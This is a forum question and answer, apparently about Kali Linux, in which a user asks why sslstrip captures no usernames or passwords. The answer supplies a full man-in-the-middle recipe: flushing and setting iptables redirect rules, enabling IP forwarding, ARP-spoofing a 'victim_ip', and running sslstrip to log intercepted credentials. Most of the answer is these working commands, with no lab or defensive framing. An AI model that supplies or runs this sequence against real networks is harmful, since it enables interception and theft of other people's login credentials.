# i get errors in SSLSTRIP and no username password

Tags: kali-linux

I have problem with sslstrip. I explain steps am following:

- I enable IP forwarding
- I set iptable for redirect
- target is UP
- `arpspoof -i wlan -t ip -r gateway sslstrip -l 8080`

i have checked few websites. there were similar problems. solutions was reinstall `sslstrip` or using some commands. also some answers said these errors are not important and can be ignored. but i still didn't get my answer and i cant see any username password in `sslstrip` the error i have pasted in `dpaste`: [here](http://dpaste.com/0JC6QTC) thank you :)

Answer (score 0):

This should help.
https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/

```
iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i wlan1 -t victim_ip router_ip
```

2nd terminal:

```
sslstrip -w arpSnifferfun.txt -l 10000
```

Or just `sslstrip -f -p -k 10000` It makes a log by default anyway..

And most up-to-date browsers will give some type of error from sslstrip like webpage not excepting the password or not catching pw/username at all. I have not found a fix to this yet.